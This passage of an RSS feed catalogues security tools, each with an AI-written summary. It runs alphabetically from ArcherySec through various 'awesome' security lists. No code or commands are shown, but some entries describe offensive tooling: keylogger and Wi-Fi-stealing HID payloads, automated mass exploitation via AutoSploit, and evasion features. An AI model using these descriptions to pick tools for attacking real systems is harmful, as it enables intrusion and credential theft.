&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; ArcherySec is an open-source vulnerability assessment and management tool designed to integrate with CI/CD pipelines, allowing for automated security testing based on scan results. It utilizes popular open-source scanning tools to perform comprehensive web and network vulnerability assessments, while also providing features for vulnerability prioritization, management, and collaboration of scan data. Key functionalities include integration with REST APIs for developers, authenticated web scanning, and support for various third-party tools like OpenVAS and OWASP ZAP.&lt;/p&gt;</description></item><item><title>Argus</title><link>https://rainmana.github.io/hackyfeed/tools/jasonxtn-argus/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/jasonxtn-argus/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Argus is a Python-based toolkit designed for information gathering and reconnaissance, enabling security analysts to assess networks, web applications, and security environments effectively. It integrates a user-friendly interface with numerous reliable modules, facilitating the efficient execution of reconnaissance tasks. Notably, it offers various installation options including direct execution, pip installation, and Docker support, ensuring ease of use across different environments.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 align="center"&gt;
 &lt;a href=""&gt;
 &lt;picture&gt;
 &lt;source height="220" media="(prefers-color-scheme: dark)" srcset="https://i.imgur.com/nGEReZh.png"&gt;
 &lt;img height="200" alt="Argus" src="https://i.imgur.com/FL0dmHd.png"&gt;
 &lt;/picture&gt;
 &lt;/a&gt;
 &lt;br&gt;
&lt;/h1&gt;
&lt;p align="center"&gt;
 A Python-based toolkit for Information Gathering &amp; Reconnaissance
&lt;/p&gt;</description></item><item><title>Artemis</title><link>https://rainmana.github.io/hackyfeed/tools/cert-polska-artemis/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/cert-polska-artemis/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Artemis is a modular vulnerability scanner designed for assessing website security, primarily used by CERT PL for scanning activities. Its notable features include the ability to automatically generate user-friendly reports detailing specific vulnerabilities, such as exposed version control system data and outdated software versions, which aids organizations in mitigating security risks.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1&gt;
 &lt;picture&gt;
 &lt;source media="(prefers-color-scheme: dark)" srcset="static/images/logo_dark.png"&gt;
 &lt;img alt="logo" width="400px" src="static/images/logo.png"&gt;
 &lt;/picture&gt;
&lt;/h1&gt;
&lt;p&gt;Artemis is a modular vulnerability scanner. It&amp;rsquo;s the tool that powers CERT PL scanning activities by
&lt;a href="https://artemis-scanner.readthedocs.io/en/latest/features.html"&gt;checking various aspects of website security&lt;/a&gt;
and &lt;a href="https://artemis-scanner.readthedocs.io/en/latest/generating-reports.html"&gt;building easy-to-read messages ready to be sent to the scanned organizations&lt;/a&gt;.&lt;/p&gt;</description></item><item><title>AsmResolver</title><link>https://rainmana.github.io/hackyfeed/tools/washi1337-asmresolver/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/washi1337-asmresolver/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; AsmResolver is a library designed for reading, modifying, and reconstructing Portable Executable (PE) files, with support for both unmanaged and managed (.NET) binaries. Its primary use case includes comprehensive manipulation of PE file structures, such as modifying sections and metadata, reconstructing Import Address Tables, and providing easy access to .NET metadata through a user-friendly API. Notable features include cross-platform compatibility, robust handling of obfuscated binaries, and support for a wide range of resource types and debugging symbols, all while being fully documented and unit tested.&lt;/p&gt;</description></item><item><title>asn</title><link>https://rainmana.github.io/hackyfeed/tools/nitefood-asn/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/nitefood-asn/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The ASN Lookup Tool and Traceroute Server is a command line utility designed for network analysis, facilitating OSINT investigations through various capabilities including ASN lookup, RPKI validity checks, and geolocation of IP addresses. Key features include JSON output for API integration, support for querying multiple simultaneous targets, and integration with Shodan for reconnaissance without direct interaction with the target systems. This tool is particularly useful in incident response scenarios, providing comprehensive network data insights while maintaining stealth.&lt;/p&gt;</description></item><item><title>asnmap</title><link>https://rainmana.github.io/hackyfeed/tools/projectdiscovery-asnmap/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/projectdiscovery-asnmap/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; asnmap is a Go CLI and library designed for quickly mapping organizational network ranges by leveraging Autonomous System Number (ASN) information. Its primary use case is for cybersecurity analysts to perform lookups for CIDR ranges based on various inputs such as ASN, organization name, domain, or IP addresses, with flexibility in output formats including JSON, CSV, and plain text. Notable features include support for multiple input types, integration with a Project Discovery Cloud Platform API for enhanced data retrieval, and the ability to operate with standard input/output.&lt;/p&gt;</description></item><item><title>athena</title><link>https://rainmana.github.io/hackyfeed/tools/athena-os-athena/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/athena-os-athena/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Athena OS is a penetration testing operating system designed for InfoSec professionals, bug bounty hunters, and cybersecurity enthusiasts. It features automated package updates through GitHub Actions, maintains a collection of security tools, and offers Docker container support, enhancing accessibility and usability for various security assessments. Notably, it provides a user-friendly experience for both seasoned professionals and newcomers in the field of cybersecurity.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 align="center"&gt;
 Dive into a new Pentesting Experience with&lt;br&gt;
Athena OS
&lt;/h1&gt;
&lt;p align="center"&gt;
 &lt;img src="https://img.shields.io/badge/Maintained%3F-Yes-CD8335"&gt;
 &lt;img src="https://badgen.net/github/release/Athena-OS/athena"&gt;
 &lt;img src="https://badgen.net/github/stars/Athena-OS/athena"&gt;
 &lt;img src="https://img.shields.io/github/issues-raw/Athena-OS/athena"&gt;
 &lt;img src="https://img.shields.io/github/issues-closed-raw/Athena-OS/athena"&gt;
 &lt;img src="https://img.shields.io/github/license/Athena-OS/athena"&gt;
&lt;/p&gt;</description></item><item><title>AttackSurfaceAnalyzer</title><link>https://rainmana.github.io/hackyfeed/tools/microsoft-attacksurfaceanalyzer/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/microsoft-attacksurfaceanalyzer/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Attack Surface Analyzer is an open-source security tool developed by Microsoft that evaluates the attack surface of a system by identifying security vulnerabilities arising from software installations or misconfigurations. Its core functionality includes the ability to compare and analyze system configurations before and after software is installed, monitoring multiple operating system components such as the file system, user accounts, and firewall settings. Version 2.3 introduces a Blazor GUI for rule authoring, enhanced performance, and support for .NET 6, along with various collectors for in-depth analysis.&lt;/p&gt;</description></item><item><title>AttackSurfaceMapper</title><link>https://rainmana.github.io/hackyfeed/tools/superhedgy-attacksurfacemapper/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/superhedgy-attacksurfacemapper/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; AttackSurfaceMapper is a reconnaissance tool designed to enhance the attack surface mapping of specified domains, subdomains, and IP addresses through a combination of open-source intelligence and active techniques. It automates the discovery of additional targets using methods such as bruteforcing, passive lookups, and network scanning, while also conducting passive reconnaissance activities like website screenshot capture, visual mapping, and credential checking against public breach databases. Notable features include customizable output formats, optional API integrations for enhanced data collection, and various reconnaissance modes including a stealthy passive option.&lt;/p&gt;</description></item><item><title>Attiny85</title><link>https://rainmana.github.io/hackyfeed/tools/mtk911-attiny85/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/mtk911-attiny85/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The DigiSpark Attiny85 repository provides a cost-effective alternative to Rubber Ducky, enabling users to program the Attiny85 to function as a Human Interface Device (HID) that sends keystrokes to a computer. It includes various pre-built payloads such as a Wi-Fi password stealer, UAC bypass, and keylogger, allowing for a range of offensive actions from data exfiltration to system exploitation. Users can easily set up their development environment and execute these payloads using the Arduino IDE.&lt;/p&gt;</description></item><item><title>AutoPentestX</title><link>https://rainmana.github.io/hackyfeed/tools/gowtham-darkseid-autopentestx/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/gowtham-darkseid-autopentestx/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; AutoPentestX is an automated penetration testing toolkit designed for streamlined security assessments. Its primary use case is to facilitate vulnerability scanning and testing in Linux environments, offering features that simplify the process of identifying and exploiting security weaknesses. The toolkit supports Python 3.8 and above, underscoring its compatibility with modern scripting standards and enhancing its applicability in cybersecurity workflows.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="autopentestx---automated-penetration-testing-toolkit"&gt;AutoPentestX - Automated Penetration Testing Toolkit&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://opensource.org/licenses/MIT"&gt;&lt;img src="https://img.shields.io/badge/License-MIT-yellow.svg" alt="License: MIT"&gt;&lt;/a&gt;
&lt;a href="https://www.python.org/downloads/"&gt;&lt;img src="https://img.shields.io/badge/python-3.8+-blue.svg" alt="Python 3.8+"&gt;&lt;/a&gt;
&lt;a href="https://www.linux.org/"&gt;&lt;img src="https://img.shields.io/badge/platform-Linux-lightgrey.svg" alt="Platform"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>AutoPWN-Suite</title><link>https://rainmana.github.io/hackyfeed/tools/gamehunterkaan-autopwn-suite/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/gamehunterkaan-autopwn-suite/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; AutoPWN Suite is a comprehensive tool designed for automatic vulnerability scanning and exploitation of systems, leveraging advanced scanning techniques such as nmap TCP-SYN scans to identify software versions and associated vulnerabilities. Key features include automatic vulnerability detection, web application testing for various exploits (LFI, XSS, SQLI), configurable scanning options, noise and evasion modes, along with easy result sharing via webhooks or email, and compatibility across multiple operating systems.&lt;/p&gt;</description></item><item><title>AutoSploit</title><link>https://rainmana.github.io/hackyfeed/tools/nullarray-autosploit/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/nullarray-autosploit/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; AutoSploit is a tool designed to automate the exploitation of remote hosts by leveraging data from services like Shodan, Censys, and Zoomeye for target acquisition. It facilitates the execution of Metasploit modules aimed at achieving Remote Code Execution and establishing reverse connections or Meterpreter sessions. Notable features include the ability to specify custom targets, set proxy configurations, and manage operational security through options like using a VPS for operation.&lt;/p&gt;</description></item><item><title>Awesome-Android-Reverse-Engineering</title><link>https://rainmana.github.io/hackyfeed/tools/user1342-awesome-android-reverse-engineering/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/user1342-awesome-android-reverse-engineering/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Awesome Android Reverse Engineering is a comprehensive repository that curates a wide range of resources, training, and tools specifically designed for reverse engineering Android applications and systems. It includes categories for static and dynamic analysis tools, decompilers, malware analysis, and extensive training materials such as courses, videos, and books. Notably, it provides a user-friendly navigation system with search functionality and highlights significant resources to facilitate efficient learning and research in Android security.&lt;/p&gt;</description></item><item><title>awesome-aws-security</title><link>https://rainmana.github.io/hackyfeed/tools/jassics-awesome-aws-security/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/jassics-awesome-aws-security/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Awesome AWS Security is a curated repository that aggregates a wide range of resources related to AWS security practices, including whitepapers, books, videos, tutorials, and security tools. It serves as a comprehensive educational tool for professionals and enthusiasts seeking to enhance their knowledge of AWS security, featuring a well-structured table of contents and links to valuable references and training materials. Notable features include categorized resources for various learning preferences, from free content to paid courses, as well as a focus on contemporary security issues and best practices.&lt;/p&gt;</description></item><item><title>Awesome-Blackhat-Tools</title><link>https://rainmana.github.io/hackyfeed/tools/ucybers-awesome-blackhat-tools/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ucybers-awesome-blackhat-tools/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Awesome Black Hat Tools is a curated repository of cybersecurity tools showcased at Black Hat events globally, serving as a practical reference for professionals in offensive, defensive, and research-driven cybersecurity. The tools are systematically organized by event location, year, and category, including Red Teaming, OSINT, and more, ensuring easy accessibility for users seeking field-tested solutions. This repository encourages community contributions to continually enhance the collection, making it a dynamic resource for current cybersecurity methodologies.&lt;/p&gt;</description></item><item><title>awesome-bugbounty-tools</title><link>https://rainmana.github.io/hackyfeed/tools/vavkamil-awesome-bugbounty-tools/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/vavkamil-awesome-bugbounty-tools/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Awesome Bug Bounty Tools is a comprehensive, curated repository of various tools utilized in the bug bounty hunting and penetration testing process. It encompasses a wide range of categories including reconnaissance, exploitation, and miscellaneous utilities, featuring tools for tasks such as subdomain enumeration, various injection techniques, and vulnerability scanning. With an extensive selection of resources, this repository aims to streamline the bug hunting workflow for security professionals.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="awesome-bug-bounty-tools-awesome"&gt;Awesome Bug Bounty Tools &lt;a href="https://awesome.re"&gt;&lt;img src="https://awesome.re/badge.svg" alt="Awesome"&gt;&lt;/a&gt;&lt;/h1&gt;
&lt;blockquote&gt;
&lt;p&gt;A curated list of various bug bounty tools&lt;/p&gt;</description></item><item><title>awesome-censys-queries</title><link>https://rainmana.github.io/hackyfeed/tools/thehappydinoa-awesome-censys-queries/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/thehappydinoa-awesome-censys-queries/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Awesome Censys Queries is a curated collection of unique and diverse queries intended for use with the Censys search engine, facilitating the exploration of various network services and devices. Its primary use case is to aid security researchers and network administrators in identifying and analyzing infrastructure, particularly in areas like industrial control systems, IoT devices, and database services. Notable features include organized categories for easy navigation, direct links to search results, and contributions from the community for expanding query resources.&lt;/p&gt;</description></item><item><title>Awesome-Cybersecurity-Handbooks</title><link>https://rainmana.github.io/hackyfeed/tools/0xsyr0-awesome-cybersecurity-handbooks/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/0xsyr0-awesome-cybersecurity-handbooks/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The &amp;ldquo;Awesome Cybersecurity Handbooks&amp;rdquo; repository is a comprehensive collection of resources and personal notes aimed at aiding individuals in the fields of red teaming and Capture The Flag (CTF) challenges. This tool features a variety of topics including information gathering, vulnerability analysis, web application assessment, and post-exploitation strategies, serving as an extensive guide for cybersecurity professionals to enhance their knowledge and skills for legal purposes. Notable aspects include frequent updates and a commitment to legal and ethical use of the provided materials.&lt;/p&gt;</description></item><item><title>awesome-executable-packing</title><link>https://rainmana.github.io/hackyfeed/tools/packing-box-awesome-executable-packing/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/packing-box-awesome-executable-packing/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Awesome Executable Packing is a comprehensive resource catalog focused on the techniques and tools related to the packing of executable files, including various formats like Portable Executable and Executable and Linkable Format. The repository collects literature, datasets, packing tools, and detection methodologies, emphasizing the key functions of packing such as compression, encryption, and obfuscation to protect and modify executables. Notable features include curated references to scholarly articles, documentation, and a classification of packers by historical context.&lt;/p&gt;</description></item><item><title>awesome-flipperzero-withModules</title><link>https://rainmana.github.io/hackyfeed/tools/roguemaster-awesome-flipperzero-withmodules/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/roguemaster-awesome-flipperzero-withmodules/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The &amp;ldquo;Awesome Flipper Zero with Modules&amp;rdquo; repository is an enhanced resource collection for the Flipper Zero device, providing a variety of plugins, payloads, and databases to extend its functionality. Notable features include access to numerous pre-configured BadUSB payloads, IR device dumps, and various custom files for generating or interacting with Flipper Zero formats. This repository serves as a comprehensive toolkit for users looking to maximize their experience and capabilities with the Flipper Zero platform.&lt;/p&gt;</description></item><item><title>awesome-golang-security</title><link>https://rainmana.github.io/hackyfeed/tools/guardrailsio-awesome-golang-security/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/guardrailsio-awesome-golang-security/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The &amp;ldquo;awesome-golang-security&amp;rdquo; repository is a curated collection of security-related resources tailored specifically for the Go programming language. It includes a variety of tools, libraries, and educational materials aimed at enhancing security in Go applications, notably covering aspects such as web framework hardening, static code analysis, and vulnerability management. Key features include middleware for CSRF protection, static analysis tools to identify security vulnerabilities in code, and comprehensive lists of known vulnerabilities for Go libraries.&lt;/p&gt;</description></item><item><title>awesome-hacker-search-engines</title><link>https://rainmana.github.io/hackyfeed/tools/edoardottt-awesome-hacker-search-engines/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/edoardottt-awesome-hacker-search-engines/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Awesome Hacker Search Engines is a curated repository of search engines specifically designed for penetration testing, vulnerability assessments, and red/blue team operations. It categorizes various resources including general search engines, servers, vulnerabilities, exploits, and more, providing tools for effective reconnaissance and threat intelligence gathering. Notable features include links to specialized engines like Shodan and the NIST NVD, enabling streamlined access to critical information for security professionals.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 align="center"&gt;
 &lt;b&gt;Awesome Hacker Search Engines&lt;/b&gt; &lt;img src="https://raw.githubusercontent.com/edoardottt/images/main/awesome-hacker-search-engines/awesome.svg"/&gt;
&lt;/h1&gt;
&lt;p align="center"&gt;
A curated list of awesome search engines useful during Penetration testing, Vulnerability assessments, Red/Blue Team operations, Bug Bounty and more
&lt;/p&gt;</description></item><item><title>awesome-hacking</title><link>https://rainmana.github.io/hackyfeed/tools/jekil-awesome-hacking/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/jekil-awesome-hacking/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Awesome hacking is an awesome collection of hacking tools.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Awesome hacking is an awesome collection of hacking tools.&lt;/p&gt;</description></item><item><title>awesome-hacking-lists</title><link>https://rainmana.github.io/hackyfeed/tools/taielab-awesome-hacking-lists/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/taielab-awesome-hacking-lists/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The &amp;ldquo;awesome-hacking-lists&amp;rdquo; repository is a curated collection of GitHub stars organized by programming languages and tools relevant to cybersecurity and hacking. Its primary use case is to provide a comprehensive reference for security professionals and enthusiasts looking for resources, projects, and exploits in various programming environments. Notable features include structured content for easy navigation and a wide array of topics spanning multiple technology stacks.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;!--lint disable awesome-contributing awesome-license awesome-list-item match-punctuation no-repeat-punctuation no-undefined-references awesome-spell-check--&gt;
&lt;h1 id="awesome-stars-awesome"&gt;Awesome Stars &lt;a href="https://github.com/sindresorhus/awesome"&gt;&lt;img src="https://awesome.re/badge.svg" alt="Awesome"&gt;&lt;/a&gt;&lt;/h1&gt;
&lt;blockquote&gt;
&lt;p&gt;A curated list of my GitHub stars! Generated by &lt;a href="https://github.com/maguowei/starred"&gt;starred&lt;/a&gt;.&lt;/p&gt;</description></item><item><title>Awesome-Hacking-Resources</title><link>https://rainmana.github.io/hackyfeed/tools/vitalysim-awesome-hacking-resources/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/vitalysim-awesome-hacking-resources/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Awesome Hacking Resources is a comprehensive collection of materials designed for individuals looking to enhance their skills in hacking and penetration testing. The repository includes various categories such as learning resources, online courses, forums, and tools crucial for topics like malware analysis and network scanning, promoting community contribution and knowledge sharing within the cybersecurity field. Notably, it features a dedicated list of tools and links to educational content, making it a valuable resource for both beginners and advanced practitioners.&lt;/p&gt;</description></item><item><title>awesome-list</title><link>https://rainmana.github.io/hackyfeed/tools/0xor0ne-awesome-list/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/0xor0ne-awesome-list/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The &amp;ldquo;Awesome Cybersecurity List&amp;rdquo; repository aggregates a personal collection of insightful blog posts, research papers, and write-ups pertaining to various aspects of cybersecurity. It serves as a resource for both enthusiasts and professionals looking for in-depth analysis on contemporary cybersecurity topics and advancements. Notable features include a chronological outline of topics and a dedicated section for cybersecurity tools, ensuring users can easily navigate through valuable content.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="awesome-cybersecurity-list"&gt;Awesome Cybersecurity List&lt;/h1&gt;
&lt;p&gt;My personal collection of awesome blog posts, write-ups, and papers focusing on cybersecurity.&lt;/p&gt;</description></item><item><title>awesome-list-of-secrets-in-environment-variables</title><link>https://rainmana.github.io/hackyfeed/tools/puliczek-awesome-list-of-secrets-in-environment-variables/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/puliczek-awesome-list-of-secrets-in-environment-variables/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The &amp;ldquo;Awesome List of Secrets in Environment Variables&amp;rdquo; repository provides a comprehensive compilation of sensitive information, such as secrets, API keys, and tokens commonly stored in environment variables across various platforms. Its primary use case is to educate and inform developers about potential vulnerabilities associated with storing secrets in environment variables and to suggest better security practices to avoid data leaks. Notable features include categorized listings of secrets from different services, security recommendations, and links to relevant documentation for each entry.&lt;/p&gt;</description></item><item><title>awesome-llvm-security</title><link>https://rainmana.github.io/hackyfeed/tools/gmh5225-awesome-llvm-security/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/gmh5225-awesome-llvm-security/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The &lt;code&gt;awesome-llvm-security&lt;/code&gt; repository is a curated collection of skills designed for AI agents and coding assistants that focus on LLVM security topics. It provides a set of specialized techniques, including binary lifting, dynamic instrumentation, code obfuscation, and various LLVM tooling resources, making it a valuable asset for developers and researchers in compiler development and security hardening. Notable features include an easy installation process for these skills using &lt;code&gt;npx&lt;/code&gt; and comprehensive resources for learning and implementing LLVM-related security practices.&lt;/p&gt;</description></item><item><title>awesome-malware-analysis</title><link>https://rainmana.github.io/hackyfeed/tools/rshipp-awesome-malware-analysis/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/rshipp-awesome-malware-analysis/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Awesome Malware Analysis repository provides a comprehensive curated list of malware analysis tools and resources, aimed at enhancing research and understanding of malware threats. Notable features include sections on various categories such as malware collections, open-source threat intelligence, detection and classification methodologies, and online scanners, facilitating a structured approach for analysts. This resource serves as a valuable reference for cybersecurity professionals seeking effective tools for malware research and investigation.&lt;/p&gt;</description></item><item><title>awesome-mobile-security</title><link>https://rainmana.github.io/hackyfeed/tools/vaib25vicky-awesome-mobile-security/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/vaib25vicky-awesome-mobile-security/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The &amp;ldquo;awesome-mobile-security&amp;rdquo; repository serves as a comprehensive resource for mobile security professionals, aggregating a wide range of blogs, papers, and how-to resources relevant to Android security and penetration testing. Its primary use case is to provide guidance and knowledge on mobile application vulnerabilities, security testing methodologies, and tools, making it a valuable asset for those aiming to improve mobile application security. Notable features include links to various security guides, OWASP resources, and pentesting labs, enabling users to deepen their understanding and practical skills in mobile security.&lt;/p&gt;</description></item><item><title>awesome-oneliner-bugbounty</title><link>https://rainmana.github.io/hackyfeed/tools/dwisiswant0-awesome-oneliner-bugbounty/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/dwisiswant0-awesome-oneliner-bugbounty/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The &amp;ldquo;Awesome One-liner Bug Bounty&amp;rdquo; repository compiles a collection of efficient one-liner scripts specifically designed for bug bounty hunting, enabling users to identify vulnerabilities in web applications quickly. Notable features include commands for detecting Local File Inclusion, Open Redirects, Cross-Site Scripting, and various CVEs, all leveraging concise syntax to streamline reconnaissance and exploitation tasks. The repository encourages community contributions, fostering a collaborative environment for continuous improvement and sharing of bug bounty strategies.&lt;/p&gt;</description></item><item><title>awesome-oscp</title><link>https://rainmana.github.io/hackyfeed/tools/0x4d31-awesome-oscp/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/0x4d31-awesome-oscp/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Awesome OSCP repository is a curated collection of resources aimed at individuals preparing for the Offensive Security Certified Professional (OSCP) certification. It includes a variety of materials such as reviews, guides, cheatsheets, and specialized scripts covering key topics like buffer overflows and privilege escalation, facilitating a structured and comprehensive study approach for aspiring penetration testers. Notable features include extensive links to preparation guides, practical hacking tips, and tools specifically designed to aid in the OSCP exam.&lt;/p&gt;</description></item><item><title>awesome-osint</title><link>https://rainmana.github.io/hackyfeed/tools/jivoi-awesome-osint/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/jivoi-awesome-osint/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Awesome OSINT is a curated repository of open-source intelligence tools and resources designed for individuals involved in Cyber Threat Intelligence (CTI) and threat hunting. The repository offers a comprehensive list of utilities across various categories, including search engines, social media tools, and data analysis resources, catering to users from beginner to advanced levels. Notable features include specialized searches for academic resources, geospatial mapping, threat actor insights, and dark web exploration, enabling proactive intelligence gathering from publicly available sources.&lt;/p&gt;</description></item><item><title>Awesome-OSINT-For-Everything</title><link>https://rainmana.github.io/hackyfeed/tools/astrosp-awesome-osint-for-everything/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/astrosp-awesome-osint-for-everything/</guid><description>&lt;blockquote&gt;
